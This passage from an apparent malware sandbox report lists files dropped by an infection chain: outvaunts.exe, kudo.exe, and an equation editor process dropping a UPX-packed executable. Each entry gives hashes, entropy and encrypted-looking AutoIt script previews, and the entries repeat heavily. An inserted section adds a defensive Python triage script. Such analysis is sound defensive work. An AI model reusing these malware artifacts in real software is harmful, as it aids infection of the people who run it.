                                                    SHA-512:9F890F3F32B82997586DAA68DFA8FF2F60B2B2CCC5F981A96C3631A608896760BFA16811C9DDF741900F9BE097B93C5CE1DC4B36868F449F798386266C984FE3
                                                    Malicious:false
                                                    Preview:EA06..D..Y&.y..+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):435344
                                                    Entropy (8bit):7.985285570664101
                                                    Encrypted:false
                                                    SSDEEP:12288:oZL9vHLfSDwwn/e/p+ODRJSKLsOOTuFXqXHd:o15HLSDh/Yp+ODRLbH8Hd
                                                    MD5:3F524A7F28B5AED776676A99EE1B7A67
                                                    SHA1:0E475D260EF5B7D3C66F38F94ABCA739FD1DB608
                                                    SHA-256:9315316D663AB61E13730C807F2F74B79588796C87353AA084500FEDF2E7E4F2
                                                    SHA-512:6C317C04A10EF103CE572FE3902CA007308DF4A300F617BA4298EE965026B85BBD470B67ED55919237102F10DD0B3BFBDC47D1EB2DC6ADDC443F412FE79BFFD7
                                                    Malicious:false
                                                    Preview:EA06......4.Z.B.E...T.n.a9..T...U.M&Uj.J.N.Mk@....x.Q......f...z.0..)..\..K......z.f...)-..U.N..imF.4..,.y5.}G.D*....d...U..r.W.\....}}..w...z..../E8.F.?..?s<..4.xo.iN.Fv9k.+K........Q4..7....f6{8^ow.{y......h...^..b.nr7.......7p_^.G...=0?w..t.p.q....o...q....*......-Y.3*.Z.S.V.........NsJ...SY..ev...V.]..5....i..qr....!..eV....U..4.,.&.R.S.K10.V.Ujt.kZ..-5*d....8.V...V.P.Q...d.....| 0..E..(T...m9...|..f.gC..<...T.Y....k5.U.p...:=A..&...~'7.L% ..e7.T@..D..@%...X......N.4.M.....Q...|.....1..*`...&.x..Zh...<|...[....dRp....<+ %...x...>......M*.Y..eK.....$.Z.........u...@<>......0.....U.eF.d..y..M...m.|\....i.S..BY...ZJM.g9.dq}.U...N.Ui..u..wg..=...C;S.............U.Ui7...k 1...+.L0..}....J.Ju..o.Q..j...Co.Zgj.?...].=.o...&.(~g...].*...5...z7bs{.._J.K.\.]j.*..0..'../wWe...<.....n9.I.ru;.Z3.p.._5.P.wZ7c.|.L.rZ.^...Ej..^W.Gj...B.K.wY.....M...f....s...E.z..s@...O..\&...ni2.Gg.:wb.}..#.o.....U...E..i..-RI.2E...{..m2e..."....!4.C>..Z;R.C..Z..C(.P.
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):14748
                                                    Entropy (8bit):7.621191303647537
                                                    Encrypted:false
                                                    SSDEEP:384:pTYznw85HhH2x2ZHDYn8oj/rFwGn1TFioPl:pAw83kCmPjJwG1jl
                                                    MD5:F6FD31D1FA46BDE50DC3C6A4A25228FF
                                                    SHA1:8D032538C2D78C4524A7AC91F71EA241653F6EC2
                                                    SHA-256:29EA00B8682E7C041C9545B37768B8A46E49D45B9B12272C56482B0641F17679
                                                    SHA-512:9F890F3F32B82997586DAA68DFA8FF2F60B2B2CCC5F981A96C3631A608896760BFA16811C9DDF741900F9BE097B93C5CE1DC4B36868F449F798386266C984FE3
                                                    Malicious:false
                                                    Preview:EA06..D..Y&.y..+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):435344
                                                    Entropy (8bit):7.985285570664101
                                                    Encrypted:false
                                                    SSDEEP:12288:oZL9vHLfSDwwn/e/p+ODRJSKLsOOTuFXqXHd:o15HLSDh/Yp+ODRLbH8Hd
                                                    MD5:3F524A7F28B5AED776676A99EE1B7A67
                                                    SHA1:0E475D260EF5B7D3C66F38F94ABCA739FD1DB608
                                                    SHA-256:9315316D663AB61E13730C807F2F74B79588796C87353AA084500FEDF2E7E4F2
                                                    SHA-512:6C317C04A10EF103CE572FE3902CA007308DF4A300F617BA4298EE965026B85BBD470B67ED55919237102F10DD0B3BFBDC47D1EB2DC6ADDC443F412FE79BFFD7
                                                    Malicious:false
                                                    Preview:EA06......4.Z.B.E...T.n.a9..T...U.M&Uj.J.N.Mk@....x.Q......f...z.0..)..\..K......z.f...)-..U.N..imF.4..,.y5.}G.D*....d...U..r.W.\....}}..w...z..../E8.F.?..?s<..4.xo.iN.Fv9k.+K........Q4..7....f6{8^ow.{y......h...^..b.nr7.......7p_^.G...=0?w..t.p.q....o...q....*......-Y.3*.Z.S.V.........NsJ...SY..ev...V.]..5....i..qr....!..eV....U..4.,.&.R.S.K10.V.Ujt.kZ..-5*d....8.V...V.P.Q...d.....| 0..E..(T...m9...|..f.gC..<...T.Y....k5.U.p...:=A..&...~'7.L% ..e7.T@..D..@%...X......N.4.M.....Q...|.....1..*`...&.x..Zh...<|...[....dRp....<+ %...x...>......M*.Y..eK.....$.Z.........u...@<>......0.....U.eF.d..y..M...m.|\....i.S..BY...ZJM.g9.dq}.U...N.Ui..u..wg..=...C;S.............U.Ui7...k 1...+.L0..}....J.Ju..o.Q..j...Co.Zgj.?...].=.o...&.(~g...].*...5...z7bs{.._J.K.\.]j.*..0..'../wWe...<.....n9.I.ru;.Z3.p.._5.P.wZ7c.|.L.rZ.^...Ej..^W.Gj...B.K.wY.....M...f....s...E.z..s@...O..\&...ni2.Gg.:wb.}..#.o.....U...E..i..-RI.2E...{..m2e..."....!4.C>..Z;R.C..Z..C(.P.
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):14748
                                                    Entropy (8bit):7.621191303647537
                                                    Encrypted:false
                                                    SSDEEP:384:pTYznw85HhH2x2ZHDYn8oj/rFwGn1TFioPl:pAw83kCmPjJwG1jl
                                                    MD5:F6FD31D1FA46BDE50DC3C6A4A25228FF
                                                    SHA1:8D032538C2D78C4524A7AC91F71EA241653F6EC2
                                                    SHA-256:29EA00B8682E7C041C9545B37768B8A46E49D45B9B12272C56482B0641F17679
                                                    SHA-512:9F890F3F32B82997586DAA68DFA8FF2F60B2B2CCC5F981A96C3631A608896760BFA16811C9DDF741900F9BE097B93C5CE1DC4B36868F449F798386266C984FE3
                                                    Malicious:false
                                                    Preview:EA06..D..Y&.y..+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):435344
                                                    Entropy (8bit):7.985285570664101
                                                    Encrypted:false
                                                    SSDEEP:12288:oZL9vHLfSDwwn/e/p+ODRJSKLsOOTuFXqXHd:o15HLSDh/Yp+ODRLbH8Hd
                                                    MD5:3F524A7F28B5AED776676A99EE1B7A67
                                                    SHA1:0E475D260EF5B7D3C66F38F94ABCA739FD1DB608
                                                    SHA-256:9315316D663AB61E13730C807F2F74B79588796C87353AA084500FEDF2E7E4F2
                                                    SHA-512:6C317C04A10EF103CE572FE3902CA007308DF4A300F617BA4298EE965026B85BBD470B67ED55919237102F10DD0B3BFBDC47D1EB2DC6ADDC443F412FE79BFFD7
                                                    Malicious:false
                                                    Preview:EA06......4.Z.B.E...T.n.a9..T...U.M&Uj.J.N.Mk@....x.Q......f...z.0..)..\..K......z.f...)-..U.N..imF.4..,.y5.}G.D*....d...U..r.W.\....}}..w...z..../E8.F.?..?s<..4.xo.iN.Fv9k.+K........Q4..7....f6{8^ow.{y......h...^..b.nr7.......7p_^.G...=0?w..t.p.q....o...q....*......-Y.3*.Z.S.V.........NsJ...SY..ev...V.]..5....i..qr....!..eV....U..4.,.&.R.S.K10.V.Ujt.kZ..-5*d....8.V...V.P.Q...d.....| 0..E..(T...m9...|..f.gC..<...T.Y....k5.U.p...:=A..&...~'7.L% ..e7.T@..D..@%...X......N.4.M.....Q...|.....1..*`...&.x..Zh...<|...[....dRp....<+ %...x...>......M*.Y..eK.....$.Z.........u...@<>......0.....U.eF.d..y..M...m.|\....i.S..BY...ZJM.g9.dq}.U...N.Ui..u..wg..=...C;S.............U.Ui7...k 1...+.L0..}....J.Ju..o.Q..j...Co.Zgj.?...].=.o...&.(~g...].*...5...z7bs{.._J.K.\.]j.*..0..'../wWe...<.....n9.I.ru;.Z3.p.._5.P.wZ7c.|.L.rZ.^...Ej..^W.Gj...B.K.wY.....M...f....s...E.z..s@...O..\&...ni2.Gg.:wb.}..#.o.....U...E..i..-RI.2E...{..m2e..."....!4.C>..Z;R.C..Z..C(.P.
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):14748
                                                    Entropy (8bit):7.621191303647537
                                                    Encrypted:false
                                                    SSDEEP:384:pTYznw85HhH2x2ZHDYn8oj/rFwGn1TFioPl:pAw83kCmPjJwG1jl
                                                    MD5:F6FD31D1FA46BDE50DC3C6A4A25228FF
                                                    SHA1:8D032538C2D78C4524A7AC91F71EA241653F6EC2
                                                    SHA-256:29EA00B8682E7C041C9545B37768B8A46E49D45B9B12272C56482B0641F17679
                                                    SHA-512:9F890F3F32B82997586DAA68DFA8FF2F60B2B2CCC5F981A96C3631A608896760BFA16811C9DDF741900F9BE097B93C5CE1DC4B36868F449F798386266C984FE3
                                                    Malicious:false
                                                    Preview:EA06..D..Y&.y..+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):435344
                                                    Entropy (8bit):7.985285570664101
                                                    Encrypted:false
                                                    SSDEEP:12288:oZL9vHLfSDwwn/e/p+ODRJSKLsOOTuFXqXHd:o15HLSDh/Yp+ODRLbH8Hd
                                                    MD5:3F524A7F28B5AED776676A99EE1B7A67
                                                    SHA1:0E475D260EF5B7D3C66F38F94ABCA739FD1DB608
                                                    SHA-256:9315316D663AB61E13730C807F2F74B79588796C87353AA084500FEDF2E7E4F2
                                                    SHA-512:6C317C04A10EF103CE572FE3902CA007308DF4A300F617BA4298EE965026B85BBD470B67ED55919237102F10DD0B3BFBDC47D1EB2DC6ADDC443F412FE79BFFD7
                                                    Malicious:false
                                                    Preview:EA06......4.Z.B.E...T.n.a9..T...U.M&Uj.J.N.Mk@....x.Q......f...z.0..)..\..K......z.f...)-..U.N..imF.4..,.y5.}G.D*....d...U..r.W.\....}}..w...z..../E8.F.?..?s<..4.xo.iN.Fv9k.+K........Q4..7....f6{8^ow.{y......h...^..b.nr7.......7p_^.G...=0?w..t.p.q....o...q....*......-Y.3*.Z.S.V.........NsJ...SY..ev...V.]..5....i..qr....!..eV....U..4.,.&.R.S.K10.V.Ujt.kZ..-5*d....8.V...V.P.Q...d.....| 0..E..(T...m9...|..f.gC..<...T.Y....k5.U.p...:=A..&...~'7.L% ..e7.T@..D..@%...X......N.4.M.....Q...|.....1..*`...&.x..Zh...<|...[....dRp....<+ %...x...>......M*.Y..eK.....$.Z.........u...@<>......0.....U.eF.d..y..M...m.|\....i.S..BY...ZJM.g9.dq}.U...N.Ui..u..wg..=...C;S.............U.Ui7...k 1...+.L0..}....J.Ju..o.Q..j...Co.Zgj.?...].=.o...&.(~g...].*...5...z7bs{.._J.K.\.]j.*..0..'../wWe...<.....n9.I.ru;.Z3.p.._5.P.wZ7c.|.L.rZ.^...Ej..^W.Gj...B.K.wY.....M...f....s...E.z..s@...O..\&...ni2.Gg.:wb.}..#.o.....U...E..i..-RI.2E...{..m2e..."....!4.C>..Z;R.C..Z..C(.P.
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):14748
                                                    Entropy (8bit):7.621191303647537
                                                    Encrypted:false
                                                    SSDEEP:384:pTYznw85HhH2x2ZHDYn8oj/rFwGn1TFioPl:pAw83kCmPjJwG1jl
                                                    MD5:F6FD31D1FA46BDE50DC3C6A4A25228FF
                                                    SHA1:8D032538C2D78C4524A7AC91F71EA241653F6EC2
                                                    SHA-256:29EA00B8682E7C041C9545B37768B8A46E49D45B9B12272C56482B0641F17679
                                                    SHA-512:9F890F3F32B82997586DAA68DFA8FF2F60B2B2CCC5F981A96C3631A608896760BFA16811C9DDF741900F9BE097B93C5CE1DC4B36868F449F798386266C984FE3
                                                    Malicious:false
                                                    Preview:EA06..D..Y&.y..+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...
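The two distinct dropped files above share a pattern that is worth checking rather than reading off the table: both are written by the dropped loader outvaunts.exe, both previews begin with the ASCII tag EA06 that AutoIt 3.2.6+ places on its compiled-script blobs (consistent with the report's "compiled AutoIt script" signature), and both have 8-bit entropy near the 8.0 ceiling, which is what an encrypted or compressed body looks like even though the report's own Encrypted field says false. The following Python is an added example, not part of the Joe Sandbox report: it recomputes entropy on the report's scale, applies those two checks to records built from the fields on this page, and verifies a file recovered from disk against the listed size and SHA-256. The 7.5 threshold, the record dictionaries and the function names are assumptions made for the example.

```python
"""Triage helper for dropped-file records of the kind listed above.

Added example, not code from the Joe Sandbox report. Recomputes the
8-bit Shannon entropy the report prints, flags random-looking blobs and
AutoIt compiled-script tags, and checks a recovered file against the
size and SHA-256 a report lists.
"""
import hashlib
import math
from collections import Counter

# Entropy above which a blob is treated as random-looking (encrypted or
# compressed). 7.5 is a common triage cut-off, not a Joe Sandbox value.
HIGH_ENTROPY = 7.5

# AutoIt 3.2.6+ tags its compiled script blobs with this 4-byte marker.
AUTOIT_SCRIPT_TAG = b"EA06"


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 .. 8.0), the report's scale."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def triage_record(record: dict) -> dict:
    """Classify one dropped-file record by its entropy and leading preview bytes."""
    entropy = record["entropy"]
    tagged = record["preview"].startswith(AUTOIT_SCRIPT_TAG)
    high = entropy >= HIGH_ENTROPY
    if tagged and high:
        verdict = "candidate AutoIt script payload (encrypted/compressed body)"
    elif high:
        verdict = "random-looking blob, inspect manually"
    else:
        verdict = "low entropy, likely plaintext or sparse data"
    return {
        "sha256": record["sha256"],
        "size": record["size"],
        "high_entropy": high,
        "autoit_tag": tagged,
        "verdict": verdict,
    }


def matches_report(data: bytes, record: dict) -> bool:
    """Check a file recovered from disk against the size and SHA-256 the report lists."""
    digest = hashlib.sha256(data).hexdigest().lower()
    return len(data) == record["size"] and digest == record["sha256"].lower()


# The two distinct files from this page, reduced to the fields the checks
# use. Preview bytes are the first four characters of each Preview line.
DROPPED = [
    {"sha256": "9315316D663AB61E13730C807F2F74B79588796C87353AA084500FEDF2E7E4F2",
     "size": 435344, "entropy": 7.985285570664101, "preview": b"EA06"},
    {"sha256": "29EA00B8682E7C041C9545B37768B8A46E49D45B9B12272C56482B0641F17679",
     "size": 14748, "entropy": 7.621191303647537, "preview": b"EA06"},
]


def triage_all(records=DROPPED) -> list:
    """Run triage_record over every record (the page's two files by default)."""
    return [triage_record(r) for r in records]


def entropy_reference() -> dict:
    """Constructed buffers that bracket the scale: flat bytes, text, uniform bytes."""
    return {
        "flat": shannon_entropy(b"\x00" * 4096),
        "text": shannon_entropy(b"the quick brown fox " * 200),
        "uniform": shannon_entropy(bytes(range(256)) * 16),
    }


if __name__ == "__main__":
    for key, value in entropy_reference().items():
        print(f"{key:8s} {value:.3f}")
    for result in triage_all():
        print(result["sha256"][:16], result["size"], result["verdict"])
```

The reference buffers show why the report's figures matter: a flat buffer scores 0.0, English text scores around 4, and a byte-uniform buffer hits the 8.0 ceiling, so 7.98 over 435 KB leaves no room for a plaintext or uncompressed PE interpretation. Note that an entropy this high only says the bytes are random-looking; whether the body is AutoIt's own script compression or a loader-specific cipher has to be settled by unpacking it, not by the table.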
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):14748
                                                    Entropy (8bit):7.621191303647537
                                                    Encrypted:false
                                                    SSDEEP:384:pTYznw85HhH2x2ZHDYn8oj/rFwGn1TFioPl:pAw83kCmPjJwG1jl
                                                    MD5:F6FD31D1FA46BDE50DC3C6A4A25228FF
                                                    SHA1:8D032538C2D78C4524A7AC91F71EA241653F6EC2
                                                    SHA-256:29EA00B8682E7C041C9545B37768B8A46E49D45B9B12272C56482B0641F17679
                                                    SHA-512:9F890F3F32B82997586DAA68DFA8FF2F60B2B2CCC5F981A96C3631A608896760BFA16811C9DDF741900F9BE097B93C5CE1DC4B36868F449F798386266C984FE3
                                                    Malicious:false
                                                    Preview:EA06..D..Y&.y..+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):14748
                                                    Entropy (8bit):7.621191303647537
                                                    Encrypted:false
                                                    SSDEEP:384:pTYznw85HhH2x2ZHDYn8oj/rFwGn1TFioPl:pAw83kCmPjJwG1jl
                                                    MD5:F6FD31D1FA46BDE50DC3C6A4A25228FF
                                                    SHA1:8D032538C2D78C4524A7AC91F71EA241653F6EC2
                                                    SHA-256:29EA00B8682E7C041C9545B37768B8A46E49D45B9B12272C56482B0641F17679
                                                    SHA-512:9F890F3F32B82997586DAA68DFA8FF2F60B2B2CCC5F981A96C3631A608896760BFA16811C9DDF741900F9BE097B93C5CE1DC4B36868F449F798386266C984FE3
                                                    Malicious:false
                                                    Preview:EA06..D..Y&.y..+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...
                                                    Process:C:\Users\user\AppData\Local\Temp\kudo.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):492544
                                                    Entropy (8bit):7.681480980447604
                                                    Encrypted:false
                                                    SSDEEP:12288:qL3HK7NKuvO6CzFmYDV0C2qk0tRi8enXWXOe:qLXuKgO6CzFzHC0tThL
                                                    MD5:134B1F6D71374D538D0CE5268BC547D2
                                                    SHA1:4ED396631E1F50ADFECEBDAD795152AD189F1516
                                                    SHA-256:6DDF551C3D7019061800785CC189ED10619EA9BF3234F5504E1CED315D0D2E96
                                                    SHA-512:D108362AA77DCF0C824B2090F58F7F6AD0F53D76FAD5AB6FE9271330BFE3337262B82CE9A5150E03139DF8ED9C42417C9EEEB12CC1847067F91C20E7CBE64539
                                                    Malicious:false
                                                    Preview:...5YPDE1CBL.09.R2K77RUt42VZRVN05ZPDE5CBL2F09SR2K77RU442VZR^O05TO.K5.K...1u.sf#^Dr%F[U$;?v-Q[4?0eW&b>G(.P=rv.d.?:PQ.[WXrN05ZPDE.j...........8.......<.p.W..N....q...{j.......D.....p.......f..........|..b...}.......#.......At.....Eo......g*!$....SR2K77RUdq2V.SSN[.~7DE5CBL2F.9QS9J9'R5142vXRVN05`kGE5SBL2659SRrK7'RU462V_RWN05ZPAE4CBL2F0.TR2O77RU440VZ.VN 5Z@DE5CRL2V09SR2K'7RU442VZRVN..\P@D5CB,5F.qSR2K77RU442VZRVN05Z.CE.xBL".69kR2K77RU442VZRVN05ZP..3CZL2Fx.URrK77RU442VZRV>55.TDE5CBL2F09SR2K77RU442VZRVN.A?(0E5C_.7F0)SR2+27RQ442VZRVN05ZPDE.CB,.4TX'32K7.SU4D7VZ.WN0Q_PDE5CBL2F09SRrK7w|1U@SVZR:.05ZPCE5MBL2.69SR2K77RU442V.RV..G)"'E5C..2F0YTR2.77R.242VZRVN05ZPDEuCB..4UU<12K..RU4.5VZnVN0}]PDE5CBL2F09SRrK7uRU442VZRVN05ZPDE5CBL2F09SR2K77RU442VZRVN05ZPDE5CBL2F09SR2K77RU442VZRVN05ZPDE5CBL2F09SR2K77RU442VZRVN05ZPDE5CBL2F09SR2K77RU442VZRVN05ZPDE5CBL2F09SR2K77RU442VZRVN05ZPDE5CBL2F09SR2K77RU442VZRVN05ZPDE5CBL2F09SR2K77RU442VZRVN05ZPDE5CBL2F09SR2K77RU442VZRVN05ZPDE5CBL2F09SR2K77RU442VZRVN05ZPDE5C
                                                    Process:C:\Users\user\AppData\Local\Temp\kudo.exe
                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):148498
                                                    Entropy (8bit):2.778002170706123
                                                    Encrypted:false
                                                    SSDEEP:192:mNxyGyDZFui0E6f/hMMVQc3GkcVoudfSq5+vLkL/IXoWq/qb35mwBgZNFJahYUt4:3
                                                    MD5:B97CFA7D4C0914EF3BB656CF7B6A95C6
                                                    SHA1:E6C61C2A88F83B07A868E7B4F8C6496697944445
                                                    SHA-256:069ECC03912BF679890E24416E068607345F8C77C7968F75CE52775C471D676F
                                                    SHA-512:4233719255F746DD17B22C0FBFA60AAB086C71DE4078B75E7E921BBB5432B35522D04BCB5C3D92BBF4E56D29E950FD8FBAFA06C0B69E97E5D3F73301B181782B
                                                    Malicious:false
                                                    Preview:2d0w02d0wx2d0w52d0w52d0w82d0wb2d0we2d0wc2d0w82d0w12d0we2d0wc2d0wc2d0wc2d0w02d0w22d0w02d0w02d0w02d0w02d0w52d0w62d0w52d0w72d0wb2d0w82d0w62d0wb2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0w52d0w82d0w42d0wb2d0w92d0w62d0w52d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0wd2d0w82d0w62d0wb2d0wa2d0w72d0w22d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w52d0w52d0w82d0w82d0wb2d0w82d0w62d0we2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0w52d0w82d0wa2d0wb2d0w92d0w62d0w52d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0wd2d0w82d0wc2d0wb2d0wa2d0w62d0wc2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w52d0w52d0w82d0we2d0wb2d0w82d0w32d0w32d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0w52d0w92d0w02d0wb2d0w92d0w32d0w22d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0wd2d0w92d0w22d0wb2d0wa2d0w22d0we2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w52d0w52d0w92d0w42d0wb2d0w82d0w62d0w42d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w9
                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                    Category:dropped
                                                    Size (bytes):832512
                                                    Entropy (8bit):7.982751682789903
                                                    Encrypted:false
                                                    SSDEEP:24576:Erl6kD68JmlotQfXTwzecW/wCyFbxXdRC:yl328U2yfdcZFFd
                                                    MD5:D6B16370CD4E60185AA88607316A0C05
                                                    SHA1:7FBC63B1203617C67E5491745BEAEDB424BAED78
                                                    SHA-256:A6D6D1C8299F97F966D72373E999B5A8E6768914E27D5533307CF6878B95DCE2
